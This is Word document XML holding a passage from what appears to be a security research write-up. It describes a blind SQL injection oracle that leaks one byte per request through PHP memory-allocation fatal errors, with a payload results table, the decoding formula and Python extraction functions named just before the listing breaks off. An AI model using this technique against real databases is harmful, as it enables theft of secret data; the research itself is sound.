        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="2a7a65"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1400" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload variant</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="2a7a65"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="800" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Row size</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="2a7a65"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1700" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Fatal message: tried to allocate</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="2a7a65"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1100" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Recovered value</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1400" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">REPEAT v=1</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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400 KB</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1700" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">401408 bytes</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1100" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1400" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">REPEAT v=5</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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2 MB</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1700" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2002944 bytes</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1100" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1400" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">REPEAT v=25</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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10 MB</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1700" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">10000032 bytes</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1100" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">25</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1400" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IF(true), v=10</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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4 MB</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1700" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4000032 bytes</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1100" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1400" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IF(false) control</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1700" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">none (normal 4,557-byte body)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1100" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">0 (no fatal)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="743"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="130" w:before="260" w:line="340" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100009" w:name="_Toc100009"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Decoding: One Request, One Full Character</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100009"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The leaked value satisfies </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">X = value * 400,000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> plus a few kilobytes of overhead, so the decoder is a single division: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">value = round(tried_to_allocate / 400000)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is what elevates the primitive from a 1-bit boolean channel to a multi-bit one: a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> single request can carry one full byte of secret data, encoding an ASCII code point from 1 to 126 directly as the row width. For cross-checks, fallbacks, and final verification, the same primitive degrades gracefully into a classic true/false oracle with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IF(cond, 400000, 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> fatal means true, normal body means false.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Two hard ceilings had to be respected while encoding values. The per-row width must stay under the server's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">max_allowed_packet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, or the server rejects the packet before mysqlnd ever buffers it (this ceiling is what later forced the nibble fallbac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">k for large byte values). And the total streamed volume must exceed 64 MB for the fatal to fire, which the 800-row generator guarantees for any row width above roughly 84 KB. Both bounds left a wide usable window the oracle was comfortable, not marginal.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="742"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="180" w:before="380" w:line="380" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100010" w:name="_Toc100010"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0f2e24"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Exploitation Pipeline</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100010"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="743"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="130" w:before="260" w:line="340" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100011" w:name="_Toc100011"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 Oracle Primitives</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100011"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The oracle was wrapped in a small Python library built on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with one HTTP session per worker thread. Two functions carried the entire attack: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">raw_alloc(expr)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends an arbitrary numeric SQL expression through the memory oracle and decodes the leaked allocation size back into a value, while </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">read_char(expr, i)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses it to extract one character of one expression at one position, with automatic degradation if the byte-wide request is rejected. The essential logic is reproduced below.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="90" w:before="160" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 4: Core extraction primitives (Python)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:left w:val="single" w:color="3ddbb5" w:sz="12" w:space="0"/>
          <w:bottom w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:insideH w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
